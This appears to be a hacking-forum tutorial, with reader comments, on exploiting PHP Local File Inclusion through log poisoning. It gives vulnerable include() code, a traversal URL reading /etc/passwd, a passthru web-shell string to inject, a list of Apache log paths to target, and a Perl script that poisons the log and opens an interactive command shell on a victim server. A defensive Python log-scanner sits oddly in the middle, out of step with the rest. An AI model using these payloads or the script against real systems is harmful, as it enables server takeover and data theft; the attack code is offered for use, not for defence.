// chapter 1 --- Logs and LFI
OK, a log file is a file that records computer activity and the activity carried out on the server.
Blah, what does that mean? In short, a log file is a file that records the activity on the computer (the server).
So every access we make is recorded in this file.
Local File Inclusion (LFI) itself can be understood as the inclusion of a file that exists locally
// chapter 2 --- The Bug (LFI Concept)
Example of code that is vulnerable to LFI:
<?php
// $page is taken straight from the query string, with no filtering
$page = $_GET['page'];
include($page);
?>
In this code it is clear that the page variable is not filtered. By modifying the URL as shown
below, an attacker can load and execute that file:
http://Injek.injekkan.com/index.php?page=../../../../../../../etc/passwd
and the result will show the contents of the file /etc/passwd.
// chapter 3 --- fuck'n file logs
As I already told you above, the log file records all activity on the server, including URLs that have been modified :) .
So by putting <? passthru($_GET[cmd]) ?> into the URL, I can run commands on the server.
Why? Remember, the log file records all activity on the server:
- manipulate the URL into --> http://Injek.injekkan.com/<? passthru($_GET[cmd]) ?>
- the file <? passthru($_GET[cmd]) ?> does not exist on the server, and the web server will record this in the log file (usually error_log)
- get your shellllllllllllllllll ............... at http://Injek.injekkan.com/../../../../../../../etc/httpd/logs/error_log?cmd=your_command_shell .....
By default the log files are stored here:
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/access_log
../../../../../../../etc/httpd/logs/access.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
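
Seen from the defending side, both steps of the technique in chapter 3 are visible in the access log: a request or header carrying a PHP open tag, then a page value that traverses to a log file. The following Python is an added example, not part of the original post; the function names and the sample log lines are constructed for illustration, and it assumes Apache's combined log format.

```python
import re
from urllib.parse import unquote

# A PHP open tag inside any logged field means the log now contains code
# that an include() of the log file would execute.
PHP_TAG = re.compile(r"<\?")
# Path traversal that resolves to a web-server log (names as listed above).
LOG_INCLUDE = re.compile(r"(\.\./)+.*(access?|error)[._]log", re.I)
# Apache "combined" log format.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>.*?)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>.*?)" "(?P<agent>.*)"$'
)

def classify(line):
    """Return the list of findings for one access-log line."""
    m = COMBINED.match(line)
    if not m:
        return ["unparsed"]  # malformed request lines deserve a look too
    findings = []
    for field in ("request", "referer", "agent"):
        value = m.group(field)
        # Check raw and URL-decoded forms; only the raw form is executable,
        # but an encoded attempt is still a probe worth flagging.
        if PHP_TAG.search(value) or PHP_TAG.search(unquote(value)):
            findings.append("php-tag-in-" + field)
    # Decode twice to catch double-encoded traversal in the query string.
    if LOG_INCLUDE.search(unquote(unquote(m.group("request")))):
        findings.append("log-file-include")
    return findings

def scan(lines):
    """Map line number (1-based) -> findings, for lines with any finding."""
    hits = {}
    for n, line in enumerate(lines, 1):
        found = classify(line.rstrip("\n"))
        if found:
            hits[n] = found
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=news HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /<? passthru($_GET[cmd]) ?> HTTP/1.1" 404 209 "-" "<? passthru($_GET[cmd]) ?>"',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?page=../../../../../../../etc/httpd/logs/error_log&cmd=id HTTP/1.1" 200 4096 "-" "-"',
]

if __name__ == "__main__":
    for n, found in scan(SAMPLE).items():
        print(n, found)
```

Detection only shows that the attempt happened; the fix belongs in the include() itself, by mapping the page parameter onto a fixed allowlist of files instead of passing it through as a path.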
// chapter 4 --- The script
use LWP::UserAgent;
$korban="victim.com";
$path="/folder/";
$code="<? passthru($_GET[cmd]) ?>";
$log = "../../../../../../../etc/httpd/logs/error_log";
print "Trying to inject the code";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$korban", PeerPort=>"80") or die "Connection Failed. ";
print $socket "GET ".$path.$code." HTTP/1.1 ";
print $socket "User-Agent: ".$code." ";
print $socket "Host: ".$korban." ";
print $socket "Connection: close ";
close($socket);
print " Code $code successfully injected in $log ";
print " Type command to run or exit to end: ";
$cmd = <STDIN>;
while($cmd !~ "exit") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$korban", PeerPort=>"80") or die "Connection Failed. ";
print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1 ";
print $socket "Host: ".$korban." ";
print $socket "Accept: */* ";
print $socket "Connection: close ";
while ($show = <$socket>)
{
print $show;
}
print "Type command to run or exit to end: ";
$cmd = <STDIN>;
}
Am I the first?

Wow, this info is great... we'll try it out right away

This is great too, let's head straight to the scene

Thanks, bro...

My head is actually spinning from looking at the scripts above. I understand a bit of HTML, but I'm not used to those knitted-together letters. You're amazing...

Even though it's an alternative, it will still be used..

Nice post, bro :D

Let me have a read

Hope it's useful, bro

A very good file, bro :D

Wow... this is a classy article...

Is the script used here dangerous or not?

Because in my opinion, log files used with a lot of scripts will later cause errors in the batch file.
Wow, cool.. :)

I still don't get it or understand it..

#honestly, from the bottom of my heart
Why not just use Douglas keylogger ....